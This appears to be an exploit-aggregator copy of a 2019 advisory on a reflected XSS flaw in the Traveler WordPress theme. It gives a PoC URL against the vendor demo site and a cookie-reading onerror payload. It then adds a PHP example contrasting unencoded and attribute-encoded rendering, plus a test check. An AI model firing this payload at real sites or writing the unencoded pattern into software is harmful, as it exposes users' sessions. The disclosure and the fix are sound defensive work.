Traveler - Travel Booking WordPress Theme v2.7 Reflected XSS Injection

CVE: CVE-2020-35863
Category: CWE-79
Price: $500
Severity: High
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2019-04-28
CPE: cpe:/a:wordpress:traveler_travel_booking_theme:2.7
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019040262

Below is a copy:

Traveler - Travel Booking WordPress Theme v2.7 Reflected XSS Injection
[*] :: Title: Traveler - Travel Booking WordPress Theme v2.7 Reflected XSS Injection
[*] :: Author: QUIXSS
[*] :: Date: 2019-04-28
[*] :: Software: Traveler - Travel Booking WordPress Theme v2.7
  
[?] :: Technical Details & Description:
# Weak security measures, such as no filtering of input field data, have been discovered in the Traveler - Travel Booking WordPress Theme. The current version of this premium WordPress theme is 2.7.

[?] :: Demo Website:
# https://themeforest.net/item/traveler-traveltourbooking-wordpress-theme/10822683
# Frontend: https://remap.travelerwp.com/

[!] :: Special Note:
# 5.822 Sales

[!] :: For developers:
# Disabling data changes on demo websites doesn't make your applications more secure. It's good for business and sales, but you are simply double-crossing your clients.

[+] :: PoC [Links]:
# https://remap.travelerwp.com/?s=%22%3E%3Cimg%20src=x%20onerror=alert(document.cookie)%3E

[+] :: PoC [Reflected XSS Injection]:
# For Reflected XSS Injection, use the default WordPress search on the demo website: https://remap.travelerwp.com/?s=[payload]
# Sample payload: "><img src=x onerror=alert(document.cookie)>
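The advisory boils down to one template mistake: the search term from the `s` parameter is reflected into an HTML attribute without attribute encoding, so a value beginning with `">` closes the `value` attribute and the `<input>` tag, and everything after it is parsed as new markup. The following standalone PHP script is an added example, not code from the advisory or from the Traveler theme, and it does not claim to show the theme's actual template; the function names are hypothetical. It renders the search box the vulnerable way and the hardened way, and includes a check a theme reviewer or test suite could use. Inside WordPress the hardened line would use `esc_attr( get_search_query() )` in place of `htmlspecialchars()`.

```php
<?php
// Added example (not from the advisory or the Traveler theme): why a search
// term reflected into an attribute needs attribute encoding, and how to check it.
// Standalone PHP 8; inside WordPress use esc_attr( get_search_query() ) rather
// than htmlspecialchars(), and never echo $_GET['s'] directly.

/**
 * Vulnerable pattern (hypothetical, for illustration): the raw request value is
 * concatenated into an HTML attribute. A value starting with "> closes the
 * attribute and the tag; the remainder becomes new elements in the page.
 */
function render_search_box_vulnerable(string $query): string
{
    return '<input type="text" name="s" value="' . $query . '">';
}

/**
 * Hardened pattern: encode for the HTML attribute context. ENT_QUOTES encodes
 * both " and ' so the value can never terminate the attribute; ENT_SUBSTITUTE
 * replaces invalid UTF-8 instead of returning an empty string.
 * WordPress equivalent: esc_attr( $query ).
 */
function render_search_box_safe(string $query): string
{
    $encoded = htmlspecialchars($query, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="s" value="' . $encoded . '">';
}

/**
 * Review check: the rendered fragment must contain exactly one tag start
 * (the <input> itself). Any second "<" followed by a letter means the
 * query broke out of the attribute.
 */
function contains_only_input_tag(string $html): bool
{
    return str_starts_with($html, '<input')
        && preg_match_all('/<[a-zA-Z]/', $html) === 1;
}

// The sample payload quoted in the advisory, as it arrives URL-decoded in $_GET['s'].
$payload = '"><img src=x onerror=alert(document.cookie)>';

echo "Vulnerable: " . render_search_box_vulnerable($payload) . PHP_EOL;
echo "Hardened:   " . render_search_box_safe($payload) . PHP_EOL;

// The check fails for the vulnerable rendering and passes for the hardened one.
var_dump(contains_only_input_tag(render_search_box_vulnerable($payload)));
var_dump(contains_only_input_tag(render_search_box_safe($payload)));
```

Run it with `php example.php` and compare the two rendered lines: in the first, the `<img>` element with its event handler sits outside the `<input>`; in the second, the whole term stays inside the `value` attribute as `&quot;&gt;&lt;img ...&gt;` and is displayed as literal text. The check function is deliberately crude (it only counts tag starts) but is enough to catch this class of template bug in a unit test without loading WordPress.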

Copyright ©2024 Exploitalert.
